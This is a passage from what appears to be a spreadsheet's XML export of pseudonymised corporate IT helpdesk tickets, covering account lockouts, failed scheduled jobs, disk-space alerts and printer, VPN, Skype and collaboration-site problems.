    <s v="install new optiplex 7020 as eagw8111311 - fy17 x64 company image"/>
    <s v="jksgwdyi greuqxko"/>
    <x v="28"/>
  </r>
  <r>
    <s v="erp SID_34 account locked "/>
    <s v="erp SID_34 account locked "/>
    <s v="pzsvjman podylbmj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp logon"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ubdihsop.ahyeqpmx@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_will you please help me to logon to erp._x000d__x000a__x000d__x000a_it doesn't want to accept my password._x000d__x000a__x000d__x000a_i think i need to put in new password??_x000d__x000a__x000d__x000a_kind "/>
    <s v="ubdihsop ahyeqpmx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2599 failed in job_scheduler at: 09/01/2016 01:30:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2599 failed in job_scheduler at: 09/01/2016 01:30:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="list of it team functions with names"/>
    <s v="_x000a__x000a_received from: kflqpite.gbeoqsnc@gmail.com_x000a__x000a_hello gso team,_x000a_can you forward us the list of it team members â€“ grouped by their function?_x000a__x000a_example_x000a__x000a__x000a_team members_x000a__x000a_it function_x000a__x000a_solution_x000a__x000a_competrhyrncy_x000a__x000a_support_x000a__x000a_erp- supply_chain_x000a__x000a_srinfhyath_x000a__x000a_vijeghtyundra_x000a__x000a_shwhdbthyuiethadri_x000a_sanhjtyhru kurtyar _x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a_windows server_x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a_active directory_x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a_security - erp_x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a_security - non-erp_x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a_"/>
    <s v="kflqpite gbeoqsnc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering_drawing_tool issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: dwsyaqpr.bzasnmvw@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_engineering_drawing_tool is not working in my system. please give me solution in this issue._x000d__x000a__x000d__x000a_"/>
    <s v="pchjidaq pvtxjaml"/>
    <x v="18"/>
  </r>
  <r>
    <s v="edi process for miro entries-urgent"/>
    <s v="_x000d__x000a__x000d__x000a_received from: neokfwiy.ufriscym@gmail.com_x000d__x000a__x000d__x000a_dear it,_x000d__x000a__x000d__x000a_please help to check  and post the outstanding miro entries  company 5321, we have created &amp; customer inwarehouse_tools yesterday, but the miro entries for interco ap have not been posted yet._x000d__x000a__x000d__x000a_please help to post the entries immediately before 12:00 today._x000d__x000a__x000d__x000a_[cid:image002.png@01d20444.161e7df0]_x000d__x000a__x000d__x000a_best "/>
    <s v="neokfwiy ufriscym"/>
    <x v="9"/>
  </r>
  <r>
    <s v="unable to take print out from engineering_drawing_tool 2006 "/>
    <s v="unable to take print out from engineering_drawing_tool 2006."/>
    <s v="pofkwlui joteryma"/>
    <x v="18"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u1 failed in job_scheduler at: 08/31/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u1 failed in job_scheduler at: 08/31/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job Job_2551 failed in job_scheduler at: 08/31/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2551 failed in job_scheduler at: 08/31/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u2 failed in job_scheduler at: 08/31/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u2 failed in job_scheduler at: 08/31/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u6 failed in job_scheduler at: 08/31/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u6 failed in job_scheduler at: 08/31/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="mii uacyltoe hxgaycze from lacw8515941 : step 'refresh page' failed: element 'span' was not found since 09:18 pm et on 08/31."/>
    <s v="mii uacyltoe hxgaycze from lacw8515941 : step 'refresh page' failed: element 'span' was not found since 09:18 pm et on 08/31."/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="13"/>
  </r>
  <r>
    <s v="mii is not working. error user authentication failed"/>
    <s v="mii is not working. error user authentication failed._x000d__x000a__x000d__x000a_erp is working, internet is working._x000d__x000a__x000d__x000a_whole plant is not able to access the system."/>
    <s v="byfskuni mhvnqodk"/>
    <x v="13"/>
  </r>
  <r>
    <s v="cannot view the drawing in mii"/>
    <s v="cannot view the drawings attached to material 6216122 in SID_34.   i checked and the version of the nxd drawing is 00.   this material also exists in SID_1 with the same value."/>
    <s v="dctvfjrn oypnxftq"/>
    <x v="40"/>
  </r>
  <r>
    <s v="shop floor server issues "/>
    <s v="_x000d__x000a__x000d__x000a_received from: vciknubg.wdlkabms@gmail.com_x000d__x000a__x000d__x000a_request assistance with our shop floor system.  all users are unable to log in an scan orders on the floor.   a previous call was placed to open a trouble ticket._x000d__x000a__x000d__x000a_"/>
    <s v="vciknubg wdlkabms"/>
    <x v="13"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/31/2016 22:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/31/2016 22:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="44"/>
  </r>
  <r>
    <s v="when employees try to log into mii, get the following error. user authentication failed"/>
    <s v="not able to scan orders in the usa plant"/>
    <s v="xdswhrif ludsxncq"/>
    <x v="13"/>
  </r>
  <r>
    <s v="password locked"/>
    <s v="_x000a__x000a_received from: cuytdmhv.yeqdmwvt@gmail.com_x000a__x000a_hello_x000a__x000a_please unlock my password for erp and net weaver._x000a__x000a_user id: kimufghtyry_x000a__x000a_"/>
    <s v="cuytdmhv yeqdmwvt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="configair server responds with &quot; 500   internal server error&quot; in case of any other logon language then &quot;en&quot;."/>
    <s v="configair server responds with &quot; 500   internal server error&quot; in case of any other logon language then &quot;en&quot; and the model &quot;mill_model&quot; is used. the issue exists in erp erp system SID_34 as well as on distributor_tool / company center - production environment.._x000d__x000a_further error message text is &quot;  error: while trying to invoke the method java.util.list.iterator() of a null object loaded from local variable 'locallist'&quot;._x000d__x000a_logon language &quot;en&quot; is ok. if our &quot;csscdrill&quot; model is used all language seem to be working fine. but once the user changes to any other language (e.g. de or it) and uses the model mill_model the configig air system responses with the error message during starting process of configair configurator."/>
    <s v="rednkluh lrpyvcxs"/>
    <x v="13"/>
  </r>
  <r>
    <s v="HostName_1045:windows disk space utilization alert - on e:\ free space less than 15% and under 5gb free. "/>
    <s v="HostName_1045:(reporting_engineering_tooling - production):windows disk space utilization alert - on e:\ free space less than 15% and under 5gb free. "/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="11"/>
  </r>
  <r>
    <s v="analysis for microsoft excel access (erp business intelligence)"/>
    <s v="_x000a__x000a_received from: zolnubvq.ehrqifxp@gmail.com_x000a__x000a_please install analysis for microsoft excel on xrqnyzhb oblghuyf and kvwrbfet jrhoqdix's computer._x000a__x000a_ashley employee number is 6656817_x000a__x000a_vic lonn employee number is 211566061_x000a__x000a_best "/>
    <s v="zolnubvq ehrqifxp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2881 failed in job_scheduler at: 08/31/2016 18:20:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2881 failed in job_scheduler at: 08/31/2016 18:20:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="12"/>
  </r>
  <r>
    <s v="ess site sales and markhtyeting tab missing."/>
    <s v="ess site sales and markhtyeting tab missing."/>
    <s v="hpakdzyj lkrtvosz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="interface: fastethernet0/27 vlan 51: lhqwx402189sf on company-na-usa-usa-switch-cl04-3-2960-access-sw03.company.com is down"/>
    <s v="interface: fastethernet0/27 Â· vlan 51: lhqwx402189sf on company-na-usa-usa-switch-cl04-3-2960-access-sw03.company.com is down"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="7"/>
  </r>
  <r>
    <s v="wifi not working, stuck on yet no networks shown, wont turn off. ony mobile broadband works"/>
    <s v="name:todghtyud usa_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:todd.usa@company.com_x000a_customer number:_x000a_telephone:734-_x000a_summary:wifi not working, stuck on yet no networks shown, wont turn off. ony mobile broadband works"/>
    <s v="lrbjqcmh jbiwtzqr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reg: warehouse_tool communication tickets "/>
    <s v="_x000a__x000a_received from: jvhqyamt.wodzrcjg@gmail.com_x000a__x000a_hello gso team,_x000a__x000a_please assign any critical warehouse_tool tickets to network team after my office hours and inform them._x000a__x000a_network ops team should be able to resolve the issues and if they need any support intern they will contact me._x000a__x000a_with best "/>
    <s v="jvhqyamt wodzrcjg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open outlook "/>
    <s v="unable to open outlook "/>
    <s v="vitpjxgm zxiqkrns"/>
    <x v="0"/>
  </r>
  <r>
    <s v="in the work center to do list production orders with crtd are showing up - they should not"/>
    <s v="in the work center to do list production orders with crtd are showing up - they should not - please look at work center 10000 in plant_3_x000d__x000a_stefdgthyo, kahrthyeui, and vinhytry discussed, the hana model is not filtering this information out.  we need to add a filter in mii.  "/>
    <s v="yrogbkts lmurgdcf"/>
    <x v="40"/>
  </r>
  <r>
    <s v="need added to printer address book \\HostName_1033\tc91"/>
    <s v="ic_x000a_ welcome, our next available agent will be with you shortly..._x000a_ interaction alerting agent._x000a_ website visitor has joined the conversation_x000a_rakthyesh ramdntythanjesh_x000a_ hi danghtnuell_x000a_fbhyeksq caexmols_x000a_ hello rakthyesh_x000a_rakthyesh ramdntythanjesh_x000a_ "/>
    <s v="fbhyeksq caexmols"/>
    <x v="2"/>
  </r>
  <r>
    <s v="phone numbers for usa canada customer service team are not working, impacting all our customers for australia canada."/>
    <s v="the global_telecom_1 numbers that are not work are;_x000a__x000a_calls to these numbers get a recording stating &quot;if you like to make a call please hang up and try again.&quot;"/>
    <s v="xweclugf qmhbjsyi"/>
    <x v="36"/>
  </r>
  <r>
    <s v="need to configure printers"/>
    <s v="need to configure printers"/>
    <s v="flyqjavm knlzewqs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_856223"/>
    <s v="ticket update on inplant_856223"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="time format needs to be changed to 24 hours."/>
    <s v="time format needs to be changed to 24 hours._x000a_computer name: awyw8328926,awyw8911727-plant_5404,awyw8911434-bnsh0504,awyw8911479-awysinic3_x000a_-connected to the user system using teamviewer._x000a_-contact :079_x000a_-connected to the pc using rdp._x000a_-added the user to the admin group._x000a_-restarted all  the pc's._x000a_-help the user change the time zone on all the pc's._x000a_-issue resolved."/>
    <s v="nrbgctwm kfwdhrmt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="activity 4 and 5 efficiency too high reported for usa"/>
    <s v="note from omufjcxr ahypftjx - _x000d__x000a__x000d__x000a_&quot;do you know if the data in the activity 4 column of the work center efficiency report is accurate? for august it is showing very high efficiency, then when i check an order, the cost isn't very far off.&quot;_x000d__x000a__x000d__x000a_&quot;activity 5 also looks strange in the report â€“ for the tipset work center it isn't pulling the correct planned pieces. everything in erp looks good when i pull up the orders â€“ just the report seems to have bad data.&quot;"/>
    <s v="entuakhp xrnhtdmk"/>
    <x v="8"/>
  </r>
  <r>
    <s v="windows password reset for jogt harrhntyl"/>
    <s v="windows password reset for jogt harrhntyl"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3194 failed in job_scheduler at: 08/31/2016 14:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3194 failed in job_scheduler at: 08/31/2016 14:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="vip 1 fax machine with phone number 724- is not working and does not have a dial tone."/>
    <s v="fax machine with phone number 724- is not working and does not have a dial tone."/>
    <s v="jetgpdqn rpfqxzvb"/>
    <x v="36"/>
  </r>
  <r>
    <s v="i need access to the deleted folder on collaboration_platform."/>
    <s v="i can't find a mti certificate tracking form on collaboration_platform and need to make sure it wasn't deleted."/>
    <s v="hdfcwmag plxstkad"/>
    <x v="15"/>
  </r>
  <r>
    <s v="reset the password for cyvdluja oxrkfpbz on other / telephony_software"/>
    <s v="please reset password to telephony_software. "/>
    <s v="cyvdluja oxrkfpbz"/>
    <x v="6"/>
  </r>
  <r>
    <s v="collaboration_platform site not launching."/>
    <s v="_x000d__x000a__x000d__x000a_received from: xlvuhjea.mjugvtnd@gmail.com_x000d__x000a__x000d__x000a_dear it help desk = i am unable to navigate out via internet explorer to places like collaboration_platform or purchasing.  also, skype will not open for me, and i can't see other people's availability on outlook or skype.  please help_x000d__x000a_yes, i've tried logging off and on, and removing the battery_x000d__x000a_no, i haven't recently changed my homepage, but yes, i did recently change my password using password_management_tool.  let me know of any questions.  "/>
    <s v="xlvuhjea mjugvtnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to knowledge center in commstorage_product tab"/>
    <s v="unable to connect to knowledge center in commstorage_product tab"/>
    <s v="mnsejpby xsrdtvkw"/>
    <x v="15"/>
  </r>
  <r>
    <s v="iscl collaboration_platform sites seem to be down"/>
    <s v="i have tried accessing several bookmarkhtys i have within the &quot;iscl realm of collaboration_platform.&quot; looks like i cannot access anything there. other people from our team are having the same issues. "/>
    <s v="ferxqvsm esmwxqlf"/>
    <x v="15"/>
  </r>
  <r>
    <s v="unable to upload file on collaboration_platform"/>
    <s v="unable to upload file on collaboration_platform"/>
    <s v="pyrtfdxu nxfkqmoy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="domain account locked out"/>
    <s v="domain account locked out"/>
    <s v="jusenflm sufbehom"/>
    <x v="0"/>
  </r>
  <r>
    <s v="issues to log into ethics course"/>
    <s v="_x000d__x000a__x000d__x000a_received from: fmzdkyqv.dbrslnhe@gmail.com_x000d__x000a__x000d__x000a_hi_x000d__x000a_i receive the following error message when trying to log into the current ethics module â€“ might have to do with chaof primarily used e-mail to fmzdkyqv.dbrslnhe@gmail.com&lt;mailto:fmzdkyqv.dbrslnhe@gmail.com&gt; â€“ please check and correct â€“ "/>
    <s v="fmzdkyqv dbrslnhe"/>
    <x v="23"/>
  </r>
  <r>
    <s v="operator forgot login password. qgwypesz fzsdnmrk user id:zemboks  61227"/>
    <s v="ic_x000d__x000a_ welcome, our next available agent will be with you shortly..._x000d__x000a_ interaction alerting agent._x000d__x000a_ website visitor has joined the conversation_x000d__x000a_rakthyesh ramdntythanjesh_x000d__x000a_ hi robhyertyj_x000d__x000a_ "/>
    <s v="xkisaybg fykpoxhu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0431842"/>
    <s v="ticket update on ticket_no0431842"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="call from vitalyst : ms crm dynamics issue "/>
    <s v="call from vitalyst : ms crm dynamics issue _x000a_contact : 2813"/>
    <s v="mwjcsiug fbwthoca"/>
    <x v="39"/>
  </r>
  <r>
    <s v="trying to sign on to purchasing system, but the website will not even load."/>
    <s v="trying to sign on to purchasing system, but the website will not even load."/>
    <s v="ljztkmds ltjkirwy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="soflex - dnc is not working.  "/>
    <s v=" soflex - dnc is not working.  unable to connect to datenbank. server HostName_754 should be restarted._x000a__x000a_phone:  49 "/>
    <s v="xmysiufa emfdltqz"/>
    <x v="11"/>
  </r>
  <r>
    <s v="bad monitor - lbdw7402361"/>
    <s v="bad monitor - lbdw8513472 - near rob ripple"/>
    <s v="juaxnvwz reampilj"/>
    <x v="2"/>
  </r>
  <r>
    <s v="bad monitor lbdw7402359"/>
    <s v="bad monitor lbdw8513460 - near braze line"/>
    <s v="juaxnvwz reampilj"/>
    <x v="2"/>
  </r>
  <r>
    <s v="job Job_1918c failed in job_scheduler at: 08/31/2016 12:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1918c failed in job_scheduler at: 08/31/2016 12:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="supply_chain_software signin "/>
    <s v="_x000a__x000a_received from: oetlgbfw.bsctrnwp@gmail.com_x000a__x000a_my password is not working_x000a_please reset my password_x000a__x000a_username matghyuthdw_x000a__x000a_"/>
    <s v="oetlgbfw bsctrnwp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bad monitor lbdw7402365"/>
    <s v="bad monitor lbdw7402365"/>
    <s v="juaxnvwz reampilj"/>
    <x v="2"/>
  </r>
  <r>
    <s v="unable to connect to printer"/>
    <s v="i am unable to connect to my printer and print things_x000d__x000a_when i try to print, it says drivers need updated, but if i go to install the drivers i get an error anyways"/>
    <s v="flyqjavm knlzewqs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to vpn"/>
    <s v="unable to connect to vpn"/>
    <s v="kzejoucl imfbsokl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access to bw production SID_37 in erp"/>
    <s v="i can log into bex via the web but it is asking for id and password.  i would need access to usa (plant_137), usa (plant_33), usa (plant_92)"/>
    <s v="chkmejsn lvidgknc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="erp SID_34 account unlock and password reset"/>
    <s v="fmvdulec jvcfdxem"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_106:volume consumed on : c:\ is more than 85% ."/>
    <s v="HostName_106:volume consumed on : c:\ is more than 85% ."/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="consultant needs collaboration_platform access"/>
    <s v="consultant, ycimqxdn wtubpdsz, requires collaboration_platform access, the same as nkqafhod xbvghozp.  both users are from schneider downs._x000d__x000a__x000d__x000a_please refer to inc1543039, submitted on august 22nd (and ticket # ticket_no1541640)._x000d__x000a__x000d__x000a_this is needed as soon as possible, as ycimqxdn wtubpdsz has started his engagement.  if he already has access, please provide the credentials he should use for his license._x000d__x000a__x000d__x000a_please contact me with any questions._x000d__x000a__x000d__x000a_"/>
    <s v="wqxzleky uwjchqor"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the hr_tool portal for finance returns an error when trying to run reports"/>
    <s v="the hr_tool portal for finance returns an error when trying to run reports"/>
    <s v="oebrjdqc nhuqmskw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="byclpwmv esafrtbh is unable to login to ticketing_tool."/>
    <s v="byclpwmv esafrtbh is unable to login to ticketing_tool."/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="problem with badge printer."/>
    <s v="problem with badge printer."/>
    <s v="epjwqaru mikoszpv"/>
    <x v="2"/>
  </r>
  <r>
    <s v="logging into mii supervisor dashbankrd results in error pop-up.. 'internal server error'"/>
    <s v="logging into mii supervisor dashbankrd results in error pop-up.. 'internal server error'. user is a member of mii operator and mii supervisor group in ad._x000a__x000a_phone; :234-"/>
    <s v="fmvdulec jvcfdxem"/>
    <x v="40"/>
  </r>
  <r>
    <s v="rechner ewew8323546; ewew8323545  neu erzeugen"/>
    <s v="rechner ewew8323546; ewew8323545  neu erzeugen"/>
    <s v="sgnubadl gpkovbah"/>
    <x v="24"/>
  </r>
  <r>
    <s v="vip 2 : printer not working "/>
    <s v="vip 2 : printer not working _x000d__x000a__x000d__x000a_driver update prompt"/>
    <s v="jwhmqnye xlpvdwre"/>
    <x v="0"/>
  </r>
  <r>
    <s v="issues with mic and screen shatryung on skype"/>
    <s v="issues with mic and screen shatryung on skype"/>
    <s v="owlgqjme qhcozdfx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="when connected to telekom (mobile broadband), the vpn does not work."/>
    <s v="when connected to telekom (mobile broadband), the vpn does not work._x000d__x000a_error : page can not be displayed._x000d__x000a_vpn works fine with wlan._x000d__x000a_"/>
    <s v="rftnxoau cwolhfyv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please forward emails to new address."/>
    <s v="user mexkspfc nocpyxaz_x000a_her old email address is no longer valid.  it has to stay valid_x000a_autoforward it to her new one_x000a_her old one is susfhtyan.malfhklouicki@company.com"/>
    <s v="vrbdqjwk uwxmbztl"/>
    <x v="19"/>
  </r>
  <r>
    <s v="ebhsm004 :volume consumed on c:\ is more than 85%."/>
    <s v="ebhsm004 :volume consumed on c:\ is more than 85%."/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="analysis for office is not working "/>
    <s v="analysis for office is not working"/>
    <s v="oncidblt ucewizyd"/>
    <x v="18"/>
  </r>
  <r>
    <s v="skype issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: zfburidj.jmilguev@gmail.com_x000d__x000a__x000d__x000a_hi there,_x000d__x000a__x000d__x000a_i cannot sign into skype and i have an important meeting i need to get on to this morning._x000d__x000a__x000d__x000a_"/>
    <s v="zfburidj jmilguev"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to call telephony_software number of  germany former germany location "/>
    <s v="when try to call telephony_software number of  germany former germany location (ex. 20445175 or 20455271) we could not hear each others._x000a_i can her them, they can hear me but we cannot communicate each others._x000a__x000a_i did a uacyltoe hxgaycze with other locations, ex. france 20666152 or uk 20500000 and it works normally._x000a__x000a_"/>
    <s v="xawlkiey demjqrfl"/>
    <x v="6"/>
  </r>
  <r>
    <s v=" ughzilfm cfibdamq called to check if the account are active"/>
    <s v=" ughzilfm cfibdamq called to check if the account are active"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not working: freezing "/>
    <s v="outlook not working: freezing "/>
    <s v="lewbzysd gqdaikbv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp running slow"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rtpmlwnk.unpambrv@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_erp is running estorage_productly slow.  i am at the usa, il reconditioning plant.  with today being the last day of the month, it is imperative that we enter as many orders as possible.  can you please look at this?_x000d__x000a__x000d__x000a_"/>
    <s v="rtpmlwnk unpambrv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to print labels."/>
    <s v="no connection between the workstation and the server uxhq010. normal printing works. unable to print labels._x000d__x000a__x000d__x000a_works fine on win 7 systems. issue is only with xp systems._x000d__x000a__x000d__x000a_printer: wezeb02. it is a barcode printer."/>
    <s v="sgnubadl gpkovbah"/>
    <x v="24"/>
  </r>
  <r>
    <s v="the e-time system is not working.  the plant controllers are receiving an error message, whenever we try to run a rpt."/>
    <s v="please review the attached document, in order to view the error message.  i can be reached on my cell at 615-or my office 615"/>
    <s v="yswgzvrc frjzcnsu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="share collaboration_platform site "/>
    <s v="_x000a_[â€Ž8/â€Ž31/â€Ž2016 1:03 pm] _x000a__x000a__x000a__x000a_hi _x000a__x000a_matheywt rovfghesntine or me are unable to share the global recruiting team site with anyone. please advise._x000a__x000a_"/>
    <s v="qcehailo wqynckxg"/>
    <x v="15"/>
  </r>
  <r>
    <s v="mm 7154294 - transfer pricing"/>
    <s v="mm 7154294 has an average customer net price (vk13 - ztfn) for 1101 of 20.60 per pc.  in october 2015 the price was per pak.  why did the price switch from per pak to per pc?  i would think that the price of this material should be 20.60 per pak and 2.06 per pc since it is a pack of 10.  it is imperative that we fix this issue immediately as we have a short time framdntye to fix the transfer price and avoid overpaying customs duties.  please advise.  "/>
    <s v="wgothrzl iokdftgn"/>
    <x v="12"/>
  </r>
  <r>
    <s v="cisco access point is not working."/>
    <s v="cisco access point is not working._x000d__x000a_mac address : 1819db8e64"/>
    <s v="sbtvploj mwtrouyl"/>
    <x v="3"/>
  </r>
  <r>
    <s v="change o365 license fron s1 to k1"/>
    <s v="could you please changes the o365 license of the following employees from &quot;s1&quot; to &quot;k1&quot;_x000a_luifdsts olhryhira - 300 1000_x000a_cost center pam001_x000a__x000a_cordrtegd 31544571 hlcrbuqa qznjshwm hlcrbuqa.qznjshwm@gmail.com_x000a_costarra         31505504 vtdygauw wqxcrzhj alex.costa@company.com_x000a_santodde1          31544416 tlvwusmh dbwuyxoq eder.santrtos@company.com_x000a_santossdm1 31542346 ojtmnpxc klacwufr ojtmnpxc.klacwufr@gmail.com_x000a_coutidfrc 3155574 cesarrogerio coutinho vetqkwpn.qajtdobg@gmail.com_x000a_santosdfd 31545621 delsonpereira santrtos delsonpereira.santrtos@company.com_x000a_santoes2 31565653 kgyboafv tlzsrvgw kgyboafv.tlzsrvgw@gmail.com_x000a_serravdsa 31564500 vagnerlrtopes eeserra vagnerlrtopes.eeserra@company.com_x000a__x000a_"/>
    <s v="gvtbduyf gdblxiva"/>
    <x v="33"/>
  </r>
  <r>
    <s v="error message for hana and not able to open file to run quote file that i need."/>
    <s v="phone 812.  when open up erp analysis for microsoft excel i get error. the error shows following message: &quot;the launcher is exited with error. see log file for more detail. the analysis add-in is not registered correctly&quot;"/>
    <s v="gdpxqyhj iapghvke"/>
    <x v="0"/>
  </r>
  <r>
    <s v="issues with company ebusiness mailbox"/>
    <s v="issues with company ebusiness mailbox"/>
    <s v="gtfdvnry nxsaqrfh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hr_tool access"/>
    <s v="_x000d__x000a__x000d__x000a_received from: umzcxfah.aoshpjiu@gmail.com_x000d__x000a__x000d__x000a_good morning,_x000d__x000a_i am unable to run any reports in hr_tool today. it worked fine yesterday._x000d__x000a__x000d__x000a_please advise._x000d__x000a_"/>
    <s v="umzcxfah aoshpjiu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype : personal certificate issue "/>
    <s v="skype : personal certificate issue "/>
    <s v="ahbwvjct sfonkwra"/>
    <x v="0"/>
  </r>
  <r>
    <s v="change date settings-citrix-multiple users"/>
    <s v="_x000a__x000a_received from: iltcxkvw.dkwmxcgn@gmail.com_x000a__x000a_hello team,_x000a__x000a_i'm writing to you as a request to change the date, for a couple of citrix users, from eastern time (us&amp;canada) to eet(eastern european time)._x000a__x000a_users for which the date should be changed from eastern time (us&amp;canada) to eet(eastern european time):_x000a__x000a_Â·         vrtvpopc_x000a__x000a_Â·         vvrnrtacri_x000a__x000a_Â·         vvrtgffada_x000a__x000a_Â·         vvrurtgsur_x000a__x000a_Â·         vvrtyjakaa_x000a__x000a_Â·         vvrtymitrd_x000a__x000a_Â·         vvdeftmea_x000a__x000a_Â·         vvbgrtyeleb_x000a__x000a_Â·         vvcodgtjud_x000a__x000a_Â·         vvggrthhibg_x000a__x000a_could you please be so kind to perform the changes and let us know is additional information is required from our side?_x000a__x000a_"/>
    <s v="sgaczfvo wxmkrzfu"/>
    <x v="11"/>
  </r>
  <r>
    <s v="no audio during meetings"/>
    <s v="no audio during meetings, also, mic doesn't work"/>
    <s v="huqvpyli ucrtkvyl"/>
    <x v="2"/>
  </r>
  <r>
    <s v="missing folder in outlook"/>
    <s v="missing folder in outlook"/>
    <s v="wbtrvdsi gdbuvszx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to get the skype add-in "/>
    <s v="unable to get the skype add-in "/>
    <s v="sidyuncg ptvogsxa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="company logo is still on the printed erp qualtiy certificates "/>
    <s v="hello, _x000d__x000a__x000d__x000a_please see attached document and e-mail with mynfoicj riuvxdas. _x000d__x000a_when we print out the certificate via vl02n, still the company logo is on the document. _x000d__x000a__x000d__x000a_we got repeat trouble with custom, deliveries are stopped etc. _x000d__x000a__x000d__x000a_"/>
    <s v="adxuzbcv uojxrivy"/>
    <x v="44"/>
  </r>
  <r>
    <s v="ticket update on inc1546812 from dslamtcb ezbmonjr"/>
    <s v="ticket update on inc1546812 from dslamtcb ezbmonjr"/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage:germany-1- (company):20 mbps link to global_telecom_1 mpls circuit is down since at 8:00 am et on 08/31.site have backup."/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _____8:00 am et on 08/31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global_telecom_1 # 000000221254416. _____________________       _x000d__x000a__x000d__x000a_12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
